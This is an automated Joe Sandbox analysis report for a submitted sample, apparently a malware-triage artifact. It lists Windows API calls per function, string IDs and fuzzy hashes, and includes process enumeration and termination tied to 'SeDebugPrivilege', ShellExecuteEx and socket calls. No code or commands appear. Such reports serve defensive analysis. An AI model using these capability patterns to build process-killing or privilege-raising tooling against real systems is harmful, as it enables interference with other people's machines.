                                                              • Instruction ID: cf52fef17ad47969d7683f12426bcdde0a88c1d0e8c473e1b839cb3bc3bf119e
                                                              • Opcode Fuzzy Hash: 8f628fc233c65f8b47b59e62365f4839cabc64f7022ad398a47e72e9e8b72b7a
                                                              • Instruction Fuzzy Hash: 05C1C371A00209ABDF10DF58C884BAFB7F5FB59314F14842EE905AB381E778AD45CB94
                                                              APIs
                                                                • Part of subcall function 0048710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00487044,80070057,?,?,?,00487455), ref: 00487127
                                                                • Part of subcall function 0048710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00487044,80070057,?,?), ref: 00487142
                                                                • Part of subcall function 0048710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00487044,80070057,?,?), ref: 00487150
                                                                • Part of subcall function 0048710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00487044,80070057,?), ref: 00487160
                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 004A9806
                                                              • _memset.LIBCMT ref: 004A9813
                                                              • _memset.LIBCMT ref: 004A9956
                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 004A9982
                                                              • CoTaskMemFree.OLE32(?), ref: 004A998D
                                                              Strings
                                                              • NULL Pointer assignment, xrefs: 004A99DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                              • String ID: NULL Pointer assignment
                                                              • API String ID: 1300414916-2785691316
                                                              • Opcode ID: be2e5b9d3b1d818faae8ab34106d2cc2f1c744999fd7afd2df8918af681e6b5e
                                                              • Instruction ID: 30b1907e46d5e7f13fb236ecb18ba762f2e03b957c29e9abc2e808a20a4f83c1
                                                              • Opcode Fuzzy Hash: be2e5b9d3b1d818faae8ab34106d2cc2f1c744999fd7afd2df8918af681e6b5e
                                                              • Instruction Fuzzy Hash: F4913971D00229EBDB10DFA5DC81EDEBBB9AF09314F20416AF419A7281DB759A44CFA4
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004B6E24
                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 004B6E38
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004B6E52
                                                              • _wcscat.LIBCMT ref: 004B6EAD
                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 004B6EC4
                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 004B6EF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window_wcscat
                                                              • String ID: SysListView32
                                                              • API String ID: 307300125-78025650
                                                              • Opcode ID: 593de034e5e4e4d0c7577d49f4f0ee42f059b4ac2b7e3f2f8a8d1d77772b2383
                                                              • Instruction ID: c20b558fdb58d53c91b410f2265d4d0fe2986c29dbe1d8ee966690228385f9d2
                                                              • Opcode Fuzzy Hash: 593de034e5e4e4d0c7577d49f4f0ee42f059b4ac2b7e3f2f8a8d1d77772b2383
                                                              • Instruction Fuzzy Hash: F741A071A00348ABEB219F64CC85BEF77A8EF08354F11052BF944A7291D6799D898B68
                                                              APIs
                                                                • Part of subcall function 00493C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00493C7A
                                                                • Part of subcall function 00493C55: Process32FirstW.KERNEL32(00000000,?), ref: 00493C88
                                                                • Part of subcall function 00493C55: CloseHandle.KERNEL32(00000000), ref: 00493D52
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004AE9A4
                                                              • GetLastError.KERNEL32 ref: 004AE9B7
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004AE9E6
                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 004AEA63
                                                              • GetLastError.KERNEL32(00000000), ref: 004AEA6E
                                                              • CloseHandle.KERNEL32(00000000), ref: 004AEAA3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                              • String ID: SeDebugPrivilege
                                                              • API String ID: 2533919879-2896544425
                                                              • Opcode ID: a080a2b34b5b5146fdea5d43db540397d76a6a728bc5186afa392bf9ed31de72
                                                              • Instruction ID: e443a5f15966283faf2c9b532830cd6138d4f4b88ee1f28935e066e11fbd9e05
                                                              • Opcode Fuzzy Hash: a080a2b34b5b5146fdea5d43db540397d76a6a728bc5186afa392bf9ed31de72
                                                              • Instruction Fuzzy Hash: 8441BF712002009FDB14EF56CC95F6EB7A5AF55318F04841EF9069B3D2DBB8AC08CB99
                                                              APIs
                                                              • LoadIconW.USER32(00000000,00007F03), ref: 00493033
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: IconLoad
                                                              • String ID: blank$info$question$stop$warning
                                                              • API String ID: 2457776203-404129466
                                                              • Opcode ID: 3a8b322f737cb3afb60ba6e45fdf9318c93562487c180e56d6fbe2951403d48c
                                                              • Instruction ID: 8a243c1926a53c7c122ca4a994ed427b1aad8f75c835ec02e748d2e39b262903
                                                              • Opcode Fuzzy Hash: 3a8b322f737cb3afb60ba6e45fdf9318c93562487c180e56d6fbe2951403d48c
                                                              • Instruction Fuzzy Hash: 26112631248386BADF149F56DC43D6B7F9C9F17366B20003FF90466282DEAC5E0456AD
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00494312
                                                              • LoadStringW.USER32(00000000), ref: 00494319
                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0049432F
                                                              • LoadStringW.USER32(00000000), ref: 00494336
                                                              • _wprintf.LIBCMT ref: 0049435C
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0049437A
                                                              Strings
                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00494357
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                              • API String ID: 3648134473-3128320259
                                                              • Opcode ID: 660666d1962b6898a538ad43d6a31ed7cc153ac45d13c518eb7c16ca01288889
                                                              • Instruction ID: 67a15d2e6a5bdde70263fd326ebd328e5485eb622182d51331a120e78095a098
                                                              • Opcode Fuzzy Hash: 660666d1962b6898a538ad43d6a31ed7cc153ac45d13c518eb7c16ca01288889
                                                              • Instruction Fuzzy Hash: 330162F3900208BFE7519BA4DD89EE7776CDB08301F0005B6BF49E6052EA745E8A4B79
                                                              APIs
                                                                • Part of subcall function 00432612: GetWindowLongW.USER32(?,000000EB), ref: 00432623
                                                              • GetSystemMetrics.USER32(0000000F), ref: 004BD47C
                                                              • GetSystemMetrics.USER32(0000000F), ref: 004BD49C
                                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 004BD6D7
                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 004BD6F5
                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 004BD716
                                                              • ShowWindow.USER32(00000003,00000000), ref: 004BD735
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004BD75A
                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 004BD77D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                              • String ID:
                                                              • API String ID: 1211466189-0
                                                              • Opcode ID: f855051c8cd353f3dba41f3c642fef60c18305397038325738341b19dac4791f
                                                              • Instruction ID: 5588d4f5b93a83764402d48e8ef8ebd2b62d06452ade2963f5aa18aaf1b3ca3a
                                                              • Opcode Fuzzy Hash: f855051c8cd353f3dba41f3c642fef60c18305397038325738341b19dac4791f
                                                              • Instruction Fuzzy Hash: 1AB17B71A00615EBDF14CF68C9C57EA7BB1BF04711F0881BAEC489B295EB38A950CB64
                                                              APIs
                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0046C1C7,00000004,00000000,00000000,00000000), ref: 00432ACF
                                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0046C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00432B17
                                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0046C1C7,00000004,00000000,00000000,00000000), ref: 0046C21A
                                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0046C1C7,00000004,00000000,00000000,00000000), ref: 0046C286
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow
                                                              • String ID:
                                                              • API String ID: 1268545403-0
                                                              • Opcode ID: b63afa98081d2f0286dda56be07d43ed2bd2616ca0751b9ddce4a298bbee4d75
                                                              • Instruction ID: d11757a1c23cc95ec0c2aa106b41c2f589901319d019f394a16d43ab9b454602
                                                              • Opcode Fuzzy Hash: b63afa98081d2f0286dda56be07d43ed2bd2616ca0751b9ddce4a298bbee4d75
                                                              • Instruction Fuzzy Hash: 54412E306047809BCB75AB298EDC77B7BD1AB4D300F14986FE48782660C6BCA846D71E
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 004970DD
                                                                • Part of subcall function 00450DB6: std::exception::exception.LIBCMT ref: 00450DEC
                                                                • Part of subcall function 00450DB6: __CxxThrowException@8.LIBCMT ref: 00450E01
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00497114
                                                              • EnterCriticalSection.KERNEL32(?), ref: 00497130
                                                              • _memmove.LIBCMT ref: 0049717E
                                                              • _memmove.LIBCMT ref: 0049719B
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 004971AA
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004971BF
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 004971DE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 256516436-0
                                                              • Opcode ID: f4521c199c5beb2526f549205064a2a6d0a2ec58414b8abfb1d7061de204d4b7
                                                              • Instruction ID: 65c8b3a9290f7d1838d85a55be07b031bb70b21fe871e17c47d6651f53706f18
                                                              • Opcode Fuzzy Hash: f4521c199c5beb2526f549205064a2a6d0a2ec58414b8abfb1d7061de204d4b7
                                                              • Instruction Fuzzy Hash: E0317235900205EBCF00DFA5DC869AF7B78EF45311F1441BAED04AB256DB349E18CBA8
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 004B61EB
                                                              • GetDC.USER32(00000000), ref: 004B61F3
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004B61FE
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 004B620A
                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 004B6246
                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004B6257
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,004B902A,?,?,000000FF,00000000,?,000000FF,?), ref: 004B6291
                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004B62B1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                              • String ID:
                                                              • API String ID: 3864802216-0
                                                              • Opcode ID: d9dc1555e50c4ad8c9f3f05f0f0377ed959ea6174997434e417a989e037c3712
                                                              • Instruction ID: 935adafaf73dda2a431baff2d52fdc4ce33f0929b3d9ee0f1a41eda9df8c6d7e
                                                              • Opcode Fuzzy Hash: d9dc1555e50c4ad8c9f3f05f0f0377ed959ea6174997434e417a989e037c3712
                                                              • Instruction Fuzzy Hash: 74318D72101210BFEF159F54CC8AFEB3BA9EF49765F040166FE089A291C6799C41CB78
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memcmp
                                                              • String ID:
                                                              • API String ID: 2931989736-0
                                                              • Opcode ID: 9545e7a404fc456d21202807966a8dd2a117247fa664fd29aef1f07cd72ac115
                                                              • Instruction ID: f8f239cbf062b6ef2a45589eaa69788bde2960d6c9124f5ffb126a56a0fe17de
                                                              • Opcode Fuzzy Hash: 9545e7a404fc456d21202807966a8dd2a117247fa664fd29aef1f07cd72ac115
                                                              • Instruction Fuzzy Hash: 8221B0616012067FA2047A129E42FBF775CDE11348B18482FFD0596B47EBACEE1683ED
                                                              APIs
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                                • Part of subcall function 0044FC86: _wcscpy.LIBCMT ref: 0044FCA9
                                                              • _wcstok.LIBCMT ref: 0049EC94
                                                              • _wcscpy.LIBCMT ref: 0049ED23
                                                              • _memset.LIBCMT ref: 0049ED56
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                              • String ID: X
                                                              • API String ID: 774024439-3081909835
                                                              • Opcode ID: 9800ec59fbd211f653009f93baf231376b8068334326a9087e245216502b4f7b
                                                              • Instruction ID: dc5ca6d883b635e57b829d48ffcaaf596575cdff625120971fc02e8b972d8e37
                                                              • Opcode Fuzzy Hash: 9800ec59fbd211f653009f93baf231376b8068334326a9087e245216502b4f7b
                                                              • Instruction Fuzzy Hash: E3C182715083419FDB64EF25C881A5EB7E0FF49314F10492EF899972A2DB78EC45CB4A
                                                              APIs
                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 004A6C00
                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 004A6C21
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004A6C34
                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 004A6CEA
                                                              • inet_ntoa.WSOCK32(?), ref: 004A6CA7
                                                                • Part of subcall function 0048A7E9: _strlen.LIBCMT ref: 0048A7F3
                                                                • Part of subcall function 0048A7E9: _memmove.LIBCMT ref: 0048A815
                                                              • _strlen.LIBCMT ref: 004A6D44
                                                              • _memmove.LIBCMT ref: 004A6DAD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                              • String ID:
                                                              • API String ID: 3619996494-0
                                                              • Opcode ID: 1fa402e117b0d3f3e52b71ce301c2f2e9be84e03adafdc30ffd25e2c8d79ed9c
                                                              • Instruction ID: 97842a73a115c14b3fe46893fcebe13c1894bf375a181ea98407fac56a3d6bab
                                                              • Opcode Fuzzy Hash: 1fa402e117b0d3f3e52b71ce301c2f2e9be84e03adafdc30ffd25e2c8d79ed9c
                                                              • Instruction Fuzzy Hash: DF811371204300ABC710EF25CC82F6FB7A8AF99718F14491EF9559B292DB78ED05CB5A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b6325a5255b2d047adc2b4ff66abde3e1510205c30aaf3a7ec9d00d6c0c7d954
                                                              • Instruction ID: 7a99f594a671cff4496a1e31a43c83454be5743964225531473a241505b7e79a
                                                              • Opcode Fuzzy Hash: b6325a5255b2d047adc2b4ff66abde3e1510205c30aaf3a7ec9d00d6c0c7d954
                                                              • Instruction Fuzzy Hash: 41716D30900109EFDB049F59CC44EBFBB75FF89314F14C15AF915AA261D738AA51CBA9
                                                              APIs
                                                              • IsWindow.USER32(01225850), ref: 004BB3EB
                                                              • IsWindowEnabled.USER32(01225850), ref: 004BB3F7
                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 004BB4DB
                                                              • SendMessageW.USER32(01225850,000000B0,?,?), ref: 004BB512
                                                              • IsDlgButtonChecked.USER32(?,?), ref: 004BB54F
                                                              • GetWindowLongW.USER32(01225850,000000EC), ref: 004BB571
                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 004BB589
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                              • String ID:
                                                              • API String ID: 4072528602-0
                                                              • Opcode ID: 8cf7ac7cf88a09bdb9915f658c892601558fa41f364ce0b7ac055592ad4927d8
                                                              • Instruction ID: d8a453c8a3edde3e178325bea40cf7334087b29106a434697276d08ea4b6a096
                                                              • Opcode Fuzzy Hash: 8cf7ac7cf88a09bdb9915f658c892601558fa41f364ce0b7ac055592ad4927d8
                                                              • Instruction Fuzzy Hash: D771AF34600604EFDB219F65CC90FFA7BB9FF09300F14416AEA4597362C7B9A851DBA8
                                                              APIs
                                                              • _memset.LIBCMT ref: 004AF448
                                                              • _memset.LIBCMT ref: 004AF511
                                                              • ShellExecuteExW.SHELL32(?), ref: 004AF556
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                                • Part of subcall function 0044FC86: _wcscpy.LIBCMT ref: 0044FCA9
                                                              • GetProcessId.KERNEL32(00000000), ref: 004AF5CD
                                                              • CloseHandle.KERNEL32(00000000), ref: 004AF5FC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
